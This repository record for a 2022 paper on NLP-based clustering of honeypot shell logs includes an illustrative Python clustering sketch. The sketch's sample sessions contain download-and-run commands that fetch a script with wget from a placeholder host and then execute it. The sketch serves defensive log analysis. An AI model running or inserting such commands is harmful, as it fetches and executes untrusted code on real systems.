Towards NLP-based Processing of Honeypot Logs / Boffa, Matteo; Milan, Giulia; Vassio, Luca; Drago, Idilio; Mellia, Marco; Ben Houidi, Zied. - Print. - (2022), pp. 314-321. (Paper presented at the 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), held in Genoa, Italy, 6-10 June 2022) [10.1109/EuroSPW55150.2022.00038].
Towards NLP-based Processing of Honeypot Logs
Boffa, Matteo; Vassio, Luca; Drago, Idilio; Mellia, Marco
2022
Abstract
Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time-consuming and cumbersome. Here, we evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We rely on a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options, and parameters. Next, we project each session into a metric space, comparing two common NLP tools: Bag of Words and Word2Vec. Last, we use a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain a few tens of clusters, which we analyze to explain the attackers' goals, e.g., obtaining system information, injecting malicious accounts, and downloading and running executables. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.

File | Access | Description | Type | License | Size | Format
---|---|---|---|---|---|---
Article_IEEE.pdf | Not available | IEEE Xplore version | 2a Post-print publisher's version / Version of Record | Non-public: private/restricted access | 774.13 kB | Adobe PDF
Workshop_WTMC.pdf | Open access | Accepted Manuscript | 2. Post-print / Author's Accepted Manuscript | Public: all rights reserved | 742.69 kB | Adobe PDF
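To make the pipeline summarized in the abstract more concrete (parse sessions, project them into a vector space, cluster them), here is a minimal sketch that uses only the Python standard library. It is not the authors' implementation. The function names, the `<PARAM>` placeholder, the greedy threshold clustering, the `threshold` value, and the example sessions are all assumptions made for illustration; the abstract does not say which clustering algorithm or parsing rules were used. Only the Bag of Words representation is shown; Word2Vec would need a trained embedding model.

```python
import math
import re
import shlex
from collections import Counter


def tokenize_session(session: str) -> list[str]:
    """Split a shell session into command, option, and parameter tokens.

    Simplification (assumption): separators inside quoted strings are not
    handled, and every parameter is replaced by a '<PARAM>' placeholder.
    """
    tokens = []
    # Commands are commonly chained with ';', '&&', '||' or '|'.
    for command in re.split(r";|&&|\|\||\|", session):
        try:
            words = shlex.split(command)
        except ValueError:
            # Unbalanced quotes: fall back to plain whitespace splitting.
            words = command.split()
        for position, word in enumerate(words):
            if position == 0 or word.startswith("-"):
                tokens.append(word)       # command name or option
            else:
                tokens.append("<PARAM>")  # parameter placeholder
    return tokens


def cosine_similarity(a: Counter, b: Counter) -> float:
    """Cosine similarity between two Bag of Words count vectors."""
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(
        sum(v * v for v in b.values())
    )
    return dot / norm if norm else 0.0


def cluster_sessions(sessions: list[str], threshold: float = 0.8) -> list[int]:
    """Greedy clustering: join the first cluster whose leader is similar enough."""
    vectors = [Counter(tokenize_session(s)) for s in sessions]
    leaders = []  # index of the first session placed in each cluster
    labels = []
    for index, vector in enumerate(vectors):
        for cluster_id, leader in enumerate(leaders):
            if cosine_similarity(vector, vectors[leader]) >= threshold:
                labels.append(cluster_id)
                break
        else:
            # No existing cluster is close enough: start a new one.
            leaders.append(index)
            labels.append(len(leaders) - 1)
    return labels


# Invented example sessions (not taken from the honeypot dataset).
sessions = [
    "uname -a; cat /proc/cpuinfo",
    "uname -a; cat /proc/meminfo",
    "cd /tmp && wget http://example.com/bot.sh && chmod +x bot.sh && ./bot.sh",
    "cd /var/tmp && wget http://example.com/x.sh && chmod +x x.sh && ./x.sh",
]
labels = cluster_sessions(sessions)
print(labels)
```

In this toy input, the two information-gathering sessions fall into one cluster and the two download-and-run sessions into another. Replacing parameters with a placeholder is one possible way to keep file names and URLs from dominating the vocabulary; other choices would give different clusters.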
Documents in IRIS are protected by copyright and all rights are reserved, unless otherwise indicated.
https://hdl.handle.net/11583/2969416